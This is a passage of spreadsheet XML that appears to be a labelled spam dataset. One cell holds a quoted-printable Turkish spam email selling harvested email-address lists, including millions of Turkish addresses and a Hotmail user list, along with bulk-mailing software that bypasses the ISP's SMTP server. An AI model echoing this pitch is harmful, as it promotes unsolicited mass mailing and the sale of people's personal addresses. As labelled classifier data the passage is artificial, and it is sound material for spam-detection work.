     =3Ctd width=3D606 height=3D16 bgcolor=3D=22#00FFFF=22=3E=3Cp align=3Dcenter=3E=3Cb=3E=3Cfont face=3DArial color=3D=22#FF0000=22=3E =3Cmarquee scrolldelay=3D100 scrollamount=3D9=3EREKLAMLARINIZA SERVET =D6DEMEYiN!!! UCUZ=2C KOLAY VE KALICI REKLAMLARINIZ iCiN BiZi ARAYINIZ=2E=2E=2E=3C=2Fmarquee=3E=3C=2Ffont=3E=3C=2Fb=3E=3C=2Ftd=3E=3C=2Ftr=3E=3Ctr=3E
       =3Ctd width=3D606 height=3D43 bgcolor=3D=22#00FFFF=22=3E=3Cp align=3Dcenter=3E=3Cfont face=3DTahoma size=3D2 color=3D=22#000000=22=3E
       =3Cbr=3E
     Bu ileti size islerinizi kolaylastirmak=2C satislarinizi arttirmak=2C kisacasi 
   milyonlara sesinizi duyurmak icin g=F6nderilmistir=2E Bu t=FCrden tanitimlarla 
   ilgilenmiyorsaniz bu iletiyi=2C &amp;quot=3Bilgilenecegini d=FCs=FCnd=FCg=FCn=FCz&amp;quot=3B tanidiklariniza 
   g=F6nderiniz=2E Bu iletinin size ve tanidiklariniza kazandiracaklarina 
   inanamayacaksiniz!=2E=3Cbr=3EHerseye ragmen bizden e-mail almak istemiyor ve satisa sundugumuz=3Cbr=3E&amp;nbsp=3Blistelerden cikmak istiyorsaniz 
   bu iletiyi bos olarak cevaplamaniz yeterli olacaktir=2E=3Cbr=3E
   T=FCm =F6nerilerinizi dikkate alip degerlendiriyoruz=2E=2E L=FCtfen olumlu olumsuz 
   elestirileriniz icin web sayfamizdaki iletisim formunu kullaniniz=2E=2E=3Cbr=3E
 &amp;nbsp=3B=3C=2Ffont=3E=3C=2Ftd=3E=3C=2Ftr=3E=3Ctr=3E
       =3Ctd width=3D606 height=3D1 bgcolor=3D=22#000000=22 bordercolorlight=3D=22#00FFFF=22 bordercolordark=3D=22#C0C0C0=22=3E
       =3Cb=3E=3Cfont color=3D=22#96B4D8=22 face=3D=22Verdana=22=3E
       =3Cmarquee scrolldelay=3D=2252=22 scrollamount=3D=225=22=3ETR Rehber 8=2E0 G=FCncellenme Tarihi 10 Temmuz 2002'dir=2E=2E TR Rehber ve World Rehberi aldiginizda bir sonraki g=FCncellemede&amp;nbsp=3B herhangi bir =FCcret =F6demeyeceksiniz=2E=2E Daha =F6nceden alis-veris de bulundugumuz m=FCsterilerimize %50 indirim imkani sunuyoruz=2E=2E=3C=2Fmarquee=3E=3C=2Ffont=3E=3C=2Fb=3E=3C=2Ftd=3E
       =3C=2Ftr=3E=3Ctr=3E=3Ctd width=3D606 height=3D184 align=3D=22center=22=3E
       &amp;nbsp=3B=3Cdiv align=3D=22center=22=3E
         =3Ccenter=3E
         =3Ctable border=3D=221=22 cellpadding=3D=220=22 cellspacing=3D=220=22 style=3D=22border-collapse=3A collapse=22 bordercolor=3D=22#111111=22 width=3D=2290%=22 id=3D=22AutoNumber4=22 height=3D=2220=22=3E
           =3Ctr=3E
             =3Ctd width=3D=22100%=22 align=3D=22center=22 height=3D=228=22 colspan=3D=223=22=3E
       =3Cp align=3D=22center=22=3E=3Cu=3E=3Cfont color=3D=22#0000FF=22 size=3D=224=22=3E=3Cb=3E=2E=3A=3ARehberlerimizin Ortak 
       =D6zellikleri=3A=3A=2E=3C=2Fb=3E=3C=2Ffont=3E=3C=2Fu=3E=3C=2Ftd=3E
           =3C=2Ftr=3E
           =3Ctr=3E
             =3Ctd width=3D=22100%=22 align=3D=22center=22 height=3D=228=22 colspan=3D=223=22=3E=3Cfont face=3DVerdana size=3D2=3E
             Detayli kategorili =3B daha fazla bilgi i=E7in web sayfam=FDzi ziyaret 
             ediniz=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E
           =3C=2Ftr=3E
           =3Ctr=3E
             =3Ctd width=3D=22100%=22 align=3D=22center=22 height=3D=228=22 colspan=3D=223=22=3E=3Cfont face=3D=22Verdana=22 size=3D=222=22=3E
             ilave programlar =3B mailling i=E7in min=2E d=FCzeyde programlar=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E
           =3C=2Ftr=3E
           =3Ctr=3E
             =3Ctd width=3D=22100%=22 align=3D=22center=22 height=3D=2210=22 colspan=3D=223=22=3E=3Cfont face=3DVerdana size=3D2=3E
             Kullanimi kolayla=FEt=FDr=FDc=FD t=FCrk=E7e d=F6k=FCman ve video format=FDnda 
             a=E7=FDklamalar=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E
           =3C=2Ftr=3E
           =3Ctr=3E
             =3Ctd width=3D=22100%=22 align=3D=22center=22 height=3D=229=22 colspan=3D=223=22=3E
             =3Cfont face=3D=22Verdana=22 size=3D=222=22=3ESanayi Rehberi =3Cu=3E
             =3Cfont color=3D=22#FF0000=22=3E=3Cb=3EHediyeli=2E=2E=3C=2Fb=3E=3C=2Ffont=3E=3C=2Fu=3E=3C=2Ffont=3E=3C=2Ftd=3E
           =3C=2Ftr=3E
           =3Ctr=3E
             =3Ctd width=3D=22100%=22 align=3D=22center=22 height=3D=229=22 colspan=3D=223=22=3E
       =3Cp align=3D=22center=22=3E
   =3Cb=3E 
   =3Cfont face=3DVerdana size=3D=222=22=3E800=2E000 =3C=2Ffont=3E=3C=2Fb=3E 
   =3Cfont face=3DVerdana size=3D=222=22=3EArama Motoruna =3Cb=3E=3Cfont color=3D=22#FF0000=22=3E =3Cu=3E=FCcretsiz=3C=2Fu=3E=3C=2Ffont=3E=3C=2Fb=3E kay=FDt 
   imkan=FD=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E
           =3C=2Ftr=3E
           =3Ctr=3E
             =3Ctd width=3D=22100%=22 align=3D=22center=22 height=3D=228=22 colspan=3D=223=22=3E
             =3Cfont face=3D=22Verdana=22 size=3D=222=22=3E** SINIRSIZ telefon=2C e-mail ve icq ile 
             destek garantisi=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E
           =3C=2Ftr=3E
           =3Ctr=3E
             =3Ctd width=3D=2226%=22 align=3D=22center=22 height=3D=228=22=3E=3Cb=3E
             =3Cfont face=3D=22Verdana=22 size=3D=222=22 color=3D=22#FF0000=22=3ETR Rehber 8=2E5=3C=2Ffont=3E=3C=2Fb=3E=3C=2Ftd=3E
             =3Ctd width=3D=2224%=22 align=3D=22center=22 height=3D=228=22=3E
             =3Cfont face=3D=22Verdana=22 size=3D=222=22=3E400=2E000=2E000 TL=2E=3C=2Ffont=3E=3C=2Ftd=3E
             =3Ctd width=3D=2250%=22 align=3D=22center=22 height=3D=228=22=3E
     =3Cfont face=3D=22Verdana=22 size=3D=222=22=3E6=2E000=2E000 T=FCrk e-mail adresi=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E
           =3C=2Ftr=3E
           =3Ctr=3E
             =3Ctd width=3D=2226%=22 align=3D=22center=22 height=3D=228=22=3E=3Cb=3E
             =3Cfont face=3D=22Verdana=22 size=3D=222=22 color=3D=22#FF0000=22=3ETR Rehber 7=2E0=3C=2Ffont=3E=3C=2Fb=3E=3C=2Ftd=3E
             =3Ctd width=3D=2224%=22 align=3D=22center=22 height=3D=228=22=3E
             =3Cfont face=3D=22Verdana=22 size=3D=222=22=3E350=2E000=2E000 TL=2E=3C=2Ffont=3E=3C=2Ftd=3E
             =3Ctd width=3D=2250%=22 align=3D=22center=22 height=3D=228=22=3E
     =3Cfont face=3D=22Verdana=22 size=3D=222=22=3E4=2E000=2E000 T=FCrk e-mail adresi=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E
           =3C=2Ftr=3E
           =3Ctr=3E
             =3Ctd width=3D=2226%=22 align=3D=22center=22 height=3D=228=22=3E=3Cb=3E
             =3Cfont face=3D=22Verdana=22 size=3D=222=22 color=3D=22#FF0000=22=3ETR Rehber =D6zel=3C=2Ffont=3E=3C=2Fb=3E=3C=2Ftd=3E
             =3Ctd width=3D=2224%=22 align=3D=22center=22 height=3D=228=22 bgcolor=3D=22#FFFF00=22=3E
             =3Cb=3E
             =3Cfont face=3D=22Verdana=22 size=3D=222=22 color=3D=22#FF0000=22=3E250=2E000=2E000 TL=2E=3C=2Ffont=3E=3C=2Fb=3E=3C=2Ftd=3E
             =3Ctd width=3D=2250%=22 align=3D=22center=22 height=3D=228=22=3E
     =3Cfont face=3D=22Verdana=22 size=3D=222=22=3E2=2E000=2E000 Firma bazl=FD e-mail adresi=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E
           =3C=2Ftr=3E
           =3Ctr=3E
             =3Ctd width=3D=2226%=22 align=3D=22center=22 height=3D=228=22=3E=3Cb=3E
             =3Cfont face=3D=22Verdana=22 size=3D=222=22 color=3D=22#FF0000=22=3EWorld Rehber 2=2E5=3C=2Ffont=3E=3C=2Fb=3E=3C=2Ftd=3E
             =3Ctd width=3D=2224%=22 align=3D=22center=22 height=3D=228=22=3E
             =3Cfont face=3D=22Verdana=22 size=3D=222=22=3E350=2E000=2E000 TL=2E=3C=2Ffont=3E=3C=2Ftd=3E
             =3Ctd width=3D=2250%=22 align=3D=22center=22 height=3D=228=22=3E=3Cp style=3D=22margin-left=3A -6=22=3E=3Cfont face=3DVerdana size=3D2=3E
             150=2E000=2E000 yabanci e-mail adresi=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E
           =3C=2Ftr=3E
           =3Ctr=3E
             =3Ctd width=3D=2226%=22 align=3D=22center=22 height=3D=228=22=3E=3Cb=3E
             =3Cfont face=3D=22Verdana=22 size=3D=222=22 color=3D=22#FF0000=22=3EICQ Rehber =D6zel=3C=2Ffont=3E=3C=2Fb=3E=3C=2Ftd=3E
             =3Ctd width=3D=2224%=22 align=3D=22center=22 height=3D=228=22=3E
             =3Cfont face=3D=22Verdana=22 size=3D=222=22=3E150=2E000=2E000 TL=2E=3C=2Ffont=3E=3C=2Ftd=3E
             =3Ctd width=3D=2250%=22 align=3D=22center=22 height=3D=228=22=3E
             =3Cfont face=3D=22Verdana=22 size=3D=222=22=3E2=2E500=2E000 T=FCrk ICQ kullan=FDc=FDsi=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E
           =3C=2Ftr=3E
           =3Ctr=3E
             =3Ctd width=3D=2226%=22 align=3D=22center=22 height=3D=228=22=3E=3Cb=3E
             =3Cfont face=3D=22Verdana=22 size=3D=222=22 color=3D=22#FF0000=22=3ESanayi Rehberi=3C=2Ffont=3E=3C=2Fb=3E=3C=2Ftd=3E
             =3Ctd width=3D=2224%=22 align=3D=22center=22 height=3D=228=22=3E
             =3Cfont face=3D=22Verdana=22 size=3D=222=22=3E50=2E000=2E000 TL=2E=3C=2Ffont=3E=3C=2Ftd=3E
             =3Ctd width=3D=2250%=22 align=3D=22center=22 height=3D=228=22=3E
             =3Cfont face=3D=22Verdana=22 size=3D=222=22=3ET=FCrkiye deki t=FCm firmalar=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E
           =3C=2Ftr=3E
           =3Ctr=3E
             =3Ctd width=3D=22100%=22 align=3D=22center=22 height=3D=221=22 colspan=3D=223=22=3E
             =3Cfont face=3D=22Verdana=22 size=3D=221=22=3E&amp;nbsp=3B=3C=2Ffont=3E=3C=2Ftd=3E
           =3C=2Ftr=3E
           =3Ctr=3E
             =3Ctd width=3D=22100%=22 align=3D=22center=22 height=3D=228=22 colspan=3D=223=22=3E
             =3Cfont face=3D=22Verdana=22 size=3D=221=22=3E* TR ve WORLD Rehber birlikte 
             aldiginizda Hotmail Kullanici listesini =3Cu=3E=3Cfont color=3D=22#FF0000=22=3E
             =3Cb=3EHEDiYE=3C=2Fb=3E=3C=2Ffont=3E=3C=2Fu=3E ediyoruz=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E
           =3C=2Ftr=3E
           =3Ctr=3E
             =3Ctd width=3D=22100%=22 align=3D=22center=22 height=3D=228=22 colspan=3D=223=22=3E
             =3Cfont face=3D=22Verdana=22 size=3D=221=22=3E* Eski m=FCsterilerimize %50 indirimimiz 
             devam etmektedir=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E
           =3C=2Ftr=3E
           =3Ctr=3E
             =3Ctd width=3D=22100%=22 align=3D=22center=22 height=3D=228=22 colspan=3D=223=22=3E
             =3Cfont size=3D=221=22 face=3D=22Verdana=22=3E* Not=3A Fiyatlara KDV ve Kargo =FCcreti 
             dahil edilmemi=FEtir=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E
           =3C=2Ftr=3E
         =3C=2Ftable=3E
         =3C=2Fcenter=3E
       =3C=2Fdiv=3E
 &amp;nbsp=3B=3C=2Ftd=3E
       =3C=2Ftr=3E=3Ctr=3E
       =3Ctd width=3D606 height=3D1 bgcolor=3D=22#00FFFF=22=3E=3Cp align=3Dcenter=3E=3Cb=3E
     =3Cfont face=3DVerdana color=3D=22#FFFFFF=22=3E =3Cspan style=3D=22background-color=3A #FF0000=22=3E
       =3Cfont size=3D=222=22=3ETR 8=2E0 ve World Rehber birlikte sadece 750=2E000=2E000 TL=2EYerine =3C=2Ffont=3E
       600=2E000=2E000 TL=2E=3C=2Fspan=3E=3C=2Ffont=3E=3C=2Fb=3E=3C=2Ftd=3E=3C=2Ftr=3E=3C=2Ftable=3E=3C=2Fcenter=3E
 =3C=2Fdiv=3E
 =3Cdiv align=3Dcenter=3E=3Ccenter=3E
   =3Ctable border=3D1 cellspacing=3D1 style=3D=22border-collapse=3A collapse=22 bordercolor=3D=22#111111=22 width=3D612 id=3DAutoNumber1 height=3D149 bgcolor=3D=22#CECFFF=22 background=3D=22http=3A=2F=2Fxyzlm22=2Esitemynet=2Ecom=2Fback1=2Egif=22=3E=3Ctr=3E
       =3Ctd width=3D606 height=3D1 bgcolor=3D=22#00FFFF=22=3E
     =3Cp align=3Dleft=3E&amp;nbsp=3B=3Cul style=3D=22margin-top=3A -8=22=3E
       =3Cli style=3D=22line-height=3A 100%=22=3E
       =3Cp align=3Djustify style=3D=22margin-right=3A 23=3B margin-top=3A -9=3B margin-bottom=3A 0=22=3E=3Cb=3E =3Cfont face=3DVerdana size=3D1=3EG=FCncelleme islemlerinde 
       ki indirim oran=FDm=FDz %50'dir=2E =3Cbr=3E
 &amp;nbsp=3B=3C=2Ffont=3E=3C=2Fb=3E=3C=2Fli=3E
       =3Cli=3E
       =3Cp align=3Dleft style=3D=22margin-right=3A 23=3B margin-top=3A -9=3B margin-bottom=3A 0=22=3E
       =3Cb=3E =3Cfont face=3DVerdana size=3D2 color=3D=22#FF0000=22=3E
       800=2E000 Arama motoruna kayit islemi 30=2E000=2E000TL + KDV =3Cbr=3E
 &amp;nbsp=3B=3C=2Ffont=3E=3C=2Fb=3E=3C=2Fli=3E
       =3Cli=3E
       =3Cp align=3Djustify style=3D=22margin-right=3A 23=3B margin-top=3A -9=3B margin-bottom=3A 0=22=3E=3Cb=3E=3Cfont face=3DVerdana size=3D1 color=3D=22#000000=22=3ET=FCm 
       versiyonlarimizda g=F6nderim islemi icin gerekli ve en kullanisli programlar 
       bulunmaktadir=2E=3C=2Ffont=3E=3Cfont face=3DVerdana size=3D1=3E Bu programlarin video 
       formatinda aciklamalari da CD'ler icerisinde bulunmaktadir=2E=2E=2E=3Cbr=3E
 &amp;nbsp=3B=3C=2Ffont=3E=3C=2Fb=3E=3C=2Fli=3E
       =3Cli=3E
       =3Cp align=3Djustify style=3D=22margin-right=3A 23=3B margin-top=3A -9=3B margin-bottom=3A 0=22=3E=3Cb=3E=3Cfont face=3D=22Verdana=22 size=3D=221=22=3EBu programlar sizin 
       iletilerinizi kolay bir sekilde g=F6ndermenizi saglarken=2C iletilerinizi 
       alan kisilerin kullandigi serverlarin da yorulmamasini=28karsi tarafta problem 
       yaratilmamasini=29 saglayacaktir=2E=2E=2E=3Cbr=3E
 &amp;nbsp=3B=3C=2Ffont=3E=3C=2Fb=3E=3C=2Fli=3E
       =3Cli=3E
       =3Cp align=3Djustify style=3D=22margin-right=3A 23=3B margin-top=3A -9=3B margin-bottom=3A 0=22=3E
       =3Cb=3E=3Cfont face=3D=22Verdana=22 size=3D=221=22=3EBu programlar ISP yada hosting firmanizin 
       SMTP serverini kullanmaniza gerek kalmadan direkt g=F6nderim yapabilmenizi 
       saglayacaktir=2E isterseniz bir checkbox'i isaretliyerek kullanmak 
       istediginiz SMTP server ile&amp;nbsp=3B fault-tolerance yaparak g=F6nderdiginiz 
       iletilerin %100 yerine ulasmasini saglayabilirsiniz=2E=2E=2E=3Cbr=3E
 &amp;nbsp=3B=3C=2Ffont=3E=3C=2Fb=3E=3C=2Fli=3E
       =3Cli=3E
       =3Cp align=3Djustify style=3D=22margin-right=3A 23=3B margin-top=3A -9=3B margin-bottom=3A 0=22=3E
       =3Cb=3E=3Cfont face=3D=22Verdana=22 size=3D=221=22=3ESMTP server kullanmadan g=F6nderdiginiz 
       mesajlar bilinenin aksine daha basarili g=F6nderim yapacakdir=2E C=FCnk=FC 
       mesajlarin yerine ulasip ulasmadigini g=F6r=FCp m=FCdahele yapmak sizin elinizde 
       olacaktir=2E=2E=2E=3Cbr=3E
 &amp;nbsp=3B=3C=2Ffont=3E=3C=2Fb=3E=3C=2Fli=3E
       =3Cli=3E
       =3Cp align=3Djustify style=3D=22margin-right=3A 23=3B margin-top=3A -9=3B margin-bottom=3A 0=22=3E
       =3Cb=3E=3Cfont face=3D=22Verdana=22 size=3D=221=22=3EAyrica bu programlar HTML formatinda 
       mesaj g=F6nderimini de desteklemektedir=2E Bu destek sayesinde renkli=2C resimli 
       daha g=F6rsel ve dikkat cekici iletiler g=F6nderebilirsiniz=2E=2E=2E=3Cbr=3E
 &amp;nbsp=3B=3C=2Ffont=3E=3C=2Fb=3E=3C=2Fli=3E
       =3Cli=3E
       =3Cp align=3Djustify style=3D=22margin-right=3A 23=3B margin-top=3A -9=3B margin-bottom=3A 0=22=3E=3Cb=3E=3Cfont face=3DVerdana size=3D1=3ECD icerisindeki b=FCy=FCk e-mail 
       listelerini kolayca d=FCzenleyebileceginiz=2C istenmeyen e-mail adreslerini 
       otomatik olarak silebileceginiz ve her t=FCrl=FC kategoriye ayirabileceginiz 
       programlar da =FCcretsiz olarak verilmektedir=2E=2E=2E=3Cbr=3E
 &amp;nbsp=3B=3C=2Ffont=3E=3C=2Fb=3E=3C=2Fli=3E
       =3Cli=3E
       =3Cp align=3Djustify style=3D=22margin-right=3A 23=3B margin-top=3A -9=3B margin-bottom=3A 0=22=3E=3Cb=3E=3Cfont face=3D=22Verdana=22 size=3D=221=22=3ETR rehber ve World 
       Rehberi birlikte aldiginizda=2C bir sonraki g=FCncel versiyonlari adresinize 
       =FCcretsiz g=F6nderiyoruz=2E=2E=2E Bunun icin l=FCtfen g=FCncelleme maili aldiginizda 
       bize geri d=F6n=FCn=FCz=2E=2E=3C=2Ffont=3E=3C=2Fb=3E=3C=2Fli=3E
     =3C=2Ful=3E
     =3C=2Ftd=3E=3C=2Ftr=3E=3Ctr=3E=3Ctd width=3D606 height=3D1 bgcolor=3D=22#00FFFF=22=3E
     =3Cp align=3D=22center=22=3E=3Cfont face=3DVerdana=3E=3Cb=3E=2E=3A=3A 
   HEDEF KiTLE TESPiDi =3A=3A=2E=3Cbr=3E=3C=2Fb=3E=3Ci=3E=3Cfont size=3D=222=22=3EHedef kitlenize ulasmanizi sa=F0layaci=F0imiz bu 
     =F6zel y=F6ntem hakkinda mutlaka bilgi isteyiniz=2E=2E=3Cbr=3E
     =3C=2Ffont=3E=3C=2Fi=3E
   =3Cb=3E=2E=3A=3A TARGET MAILLING =3A=3A=2E=3C=2Fb=3E=3C=2Ffont=3E=3C=2Ftd=3E=3C=2Ftr=3E=3C=2Ftable=3E=3C=2Fcenter=3E=3C=2Fdiv=3E=3Cdiv align=3Dcenter=3E=3Ccenter=3E
   =3Ctable border=3D1 cellpadding=3D2 cellspacing=3D1 style=3D=22border-collapse=3A collapse=22 bordercolor=3D=22#111111=22 width=3D612 id=3DAutoNumber3 height=3D131 bgcolor=3D=22#CECFFF=22 background=3D=22http=3A=2F=2Fxyzlm22=2Esitemynet=2Ecom=2Fback1=2Egif=22=3E=3Ctr=3E
     =3Ctd width=3D607 height=3D20 bgcolor=3D=22#00FFFF=22=3E
   =3Cp align=3D=22center=22=3E=3Cu=3E=3Cb=3Eiletisim Bilgileri =3A =28 Pazar haric herg=FCn 09=3A00 ile 19=3A30 arasi=29=3C=2Fb=3E=3C=2Fu=3E=3C=2Ftd=3E=3C=2Ftr=3E=3Ctr=3E
       =3Ctd width=3D607 height=3D52=3E=3Cp align=3Dcenter=3E=3Cfont face=3DVerdana size=3D=224=22=3E
       =3Cspan style=3D=22background-color=3A #FF0000=22=3EGSM=3A+ 90 535 482=2E97=2E19&amp;nbsp=3B G=F6khan 
       ATASOY=3Cbr=3E
       =3Cfont color=3D=22#FFFF00=22=3E
       =3Cmarquee width=3D=22386=22=3ETAKLiTLERiMiZDEN SAKININ=2C GARANTiSi OLMAYAN =FCR=FCNLER=2C HiZMETLER KARiYERiNiZi ZEDELEYEBiLiR=2E=2E=3C=2Fmarquee=3E=3C=2Ffont=3E=3C=2Fspan=3E=3C=2Ffont=3E=3C=2Ftd=3E=3C=2Ftr=3E=3Ctr=3E=3Ctd width=3D607 height=3D109=3E=3Cp align=3Dcenter=3E=3Cb=3E =3Cfont face=3D=22Verdana=2C Arial=2C Helvetica=2C sans-serif=22 color=3D=22#FF0000=22=3E&amp;nbsp=3BG=FCn=FCm=FCz 
   T=FCrkiye'sinde internet 
   araciligiyla yapilan reklamlar hizla artmaktadir=2E T=FCrkiye'de ve d=FCnyada bircok 
   firma bu y=F6ntemlerle kendini tanitmaktadir=2EBu artisin icinde sizin de yeralmaniz 
   kacinilmaz bir gercek olacaktir=2E=3C=2Ffont=3E=3C=2Fb=3E=3C=2Ftd=3E=3C=2Ftr=3E=3Ctr=3E
       =3Ctd width=3D607 height=3D1=3E=3Cp align=3Dcenter=3E=3Cfont face=3DTahoma size=3D2 color=3D=22#000000=22=3EHerseye ragmen bizden e-mail almak istemiyor ve satisa sundugumuz=3Cbr=3E
       &amp;nbsp=3Blistelerden cikmak istiyorsaniz =3C=2Ffont=3E=3Cb=3E
       =3Ca href=3D=22mailto=3Auyeiptal=40gmx=2Enet=22=3Euyeiptal=40gmx=2Enet=3C=2Fa=3E=3C=2Fb=3E=3Cfont face=3D=22Arial=22 color=3D=22#ffffff=22 size=3D=222=22=3E=3Cb=3E&amp;nbsp=3B
       =3C=2Fb=3E=3C=2Ffont=3E=3Cfont face=3DTahoma size=3D2 color=3D=22#000000=22=3Eadresine bo=FE bir mail g=F6ndermeniz yeterli olacakd=FDr=2E=3C=2Ffont=3E=3C=2Ftd=3E=3C=2Ftr=3E=3C=2Ftable=3E=3C=2Fcenter=3E=3C=2Fdiv=3E
 =3C=2Fbody=3E=3C=2Fhtml=3E
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Sitescooper-talk mailing list
 Sitescooper-talk@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/sitescooper-talk
</f>
        <v>#ERROR!</v>
      </c>
      <c r="D3130" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="3131" hidden="1">
      <c r="A3131" s="1">
        <v>3129.0</v>
      </c>
      <c r="B3131" s="1" t="s">
        <v>4916</v>
      </c>
      <c r="C3131" s="1" t="s">
        <v>4917</v>
      </c>
      <c r="D3131" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3132" hidden="1">
      <c r="A3132" s="1">
        <v>3130.0</v>
      </c>
      <c r="B3132" s="1" t="s">
        <v>4918</v>
      </c>
      <c r="C3132" s="1" t="s">
        <v>4919</v>
      </c>
      <c r="D3132" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3133" hidden="1">
      <c r="A3133" s="1">
        <v>3131.0</v>
      </c>
      <c r="B3133" s="1" t="s">
        <v>4920</v>
      </c>
      <c r="C3133" s="1" t="s">
        <v>4921</v>
      </c>
      <c r="D3133" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3134" hidden="1">
      <c r="A3134" s="1">
        <v>3132.0</v>
      </c>
      <c r="B3134" s="1" t="s">
        <v>827</v>
      </c>
      <c r="C3134" s="1" t="s">
        <v>1305</v>
      </c>
      <c r="D3134" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3135" hidden="1">
      <c r="A3135" s="1">
        <v>3133.0</v>
      </c>
      <c r="B3135" s="1" t="s">
        <v>4922</v>
      </c>
      <c r="C3135" s="1" t="s">
        <v>4923</v>
      </c>
      <c r="D3135" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3136" hidden="1">
      <c r="A3136" s="1">
        <v>3134.0</v>
      </c>
      <c r="B3136" s="1" t="s">
        <v>1957</v>
      </c>
      <c r="C3136" s="1" t="s">
        <v>1958</v>
      </c>
      <c r="D3136" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3137" hidden="1">
      <c r="A3137" s="1">
        <v>3135.0</v>
      </c>
      <c r="B3137" s="1" t="s">
        <v>1508</v>
      </c>
      <c r="C3137" s="1" t="s">
        <v>4924</v>
      </c>
      <c r="D3137" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3138">
      <c r="A3138" s="1">
        <v>3136.0</v>
      </c>
      <c r="B3138" s="1" t="s">
        <v>4925</v>
      </c>
      <c r="C3138" s="1" t="s">
        <v>4926</v>
      </c>
      <c r="D3138" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="3139" hidden="1">
      <c r="A3139" s="1">
        <v>3137.0</v>
      </c>
      <c r="B3139" s="1" t="s">
        <v>4927</v>
      </c>
      <c r="C3139" s="1" t="s">
        <v>4928</v>
      </c>
      <c r="D3139" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3140" hidden="1">
      <c r="A3140" s="1">
        <v>3138.0</v>
      </c>
      <c r="B3140" s="1" t="s">
        <v>4929</v>
      </c>
      <c r="C3140" s="1" t="s">
        <v>4930</v>
      </c>
      <c r="D3140" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3141">
      <c r="A3141" s="1">
        <v>3139.0</v>
      </c>
      <c r="B3141" s="1" t="s">
        <v>4931</v>
      </c>
      <c r="C3141" s="1" t="s">
        <v>4932</v>
      </c>
      <c r="D3141" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="3142">
      <c r="A3142" s="1">
        <v>3140.0</v>
      </c>
      <c r="B3142" s="1" t="s">
        <v>4933</v>
      </c>
      <c r="C3142" s="1" t="s">
        <v>356</v>
      </c>
      <c r="D3142" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="3143">
      <c r="A3143" s="1">
        <v>3141.0</v>
      </c>
      <c r="B3143" s="1" t="s">
        <v>4934</v>
      </c>
      <c r="C3143" s="1" t="s">
        <v>4935</v>
      </c>
      <c r="D3143" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="3144" hidden="1">
      <c r="A3144" s="1">
        <v>3142.0</v>
      </c>
      <c r="B3144" s="1" t="s">
        <v>3449</v>
      </c>
      <c r="C3144" s="1" t="s">
        <v>4936</v>
      </c>
      <c r="D3144" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3145">
      <c r="A3145" s="1">
        <v>3143.0</v>
      </c>
      <c r="B3145" s="1" t="s">
        <v>4937</v>
      </c>
      <c r="C3145" s="1" t="s">
        <v>4938</v>
      </c>
      <c r="D3145" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="3146">
      <c r="A3146" s="1">
        <v>3144.0</v>
      </c>
      <c r="B3146" s="1" t="s">
        <v>4939</v>
      </c>
      <c r="C3146" s="1" t="s">
        <v>4940</v>
      </c>
      <c r="D3146" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="3147" hidden="1">
      <c r="A3147" s="1">
        <v>3145.0</v>
      </c>
      <c r="B3147" s="1" t="s">
        <v>2402</v>
      </c>
      <c r="C3147" s="1" t="s">
        <v>4941</v>
      </c>
      <c r="D3147" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3148" hidden="1">
      <c r="A3148" s="1">
        <v>3146.0</v>
      </c>
      <c r="B3148" s="1" t="s">
        <v>4942</v>
      </c>
      <c r="C3148" s="1" t="s">
        <v>4943</v>
      </c>
      <c r="D3148" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3149" hidden="1">
      <c r="A3149" s="1">
        <v>3147.0</v>
      </c>
      <c r="B3149" s="1" t="s">
        <v>4944</v>
      </c>
      <c r="C3149" s="1" t="s">
        <v>4945</v>
      </c>
      <c r="D3149" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3150" hidden="1">
      <c r="A3150" s="1">
        <v>3148.0</v>
      </c>
      <c r="B3150" s="1" t="s">
        <v>3715</v>
      </c>
      <c r="C3150" s="1" t="s">
        <v>4946</v>
      </c>
      <c r="D3150" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3151" hidden="1">
      <c r="A3151" s="1">
        <v>3149.0</v>
      </c>
      <c r="B3151" s="1" t="s">
        <v>361</v>
      </c>
      <c r="C3151" s="1" t="s">
        <v>1056</v>
      </c>
      <c r="D3151" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3152" hidden="1">
      <c r="A3152" s="1">
        <v>3150.0</v>
      </c>
      <c r="B3152" s="1" t="s">
        <v>4563</v>
      </c>
      <c r="C3152" s="1" t="s">
        <v>4947</v>
      </c>
      <c r="D3152" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3153" hidden="1">
      <c r="A3153" s="1">
        <v>3151.0</v>
      </c>
      <c r="B3153" s="1" t="s">
        <v>4948</v>
      </c>
      <c r="C3153" s="1" t="s">
        <v>4949</v>
      </c>
      <c r="D3153" s="1">
        <v>0.0</v>
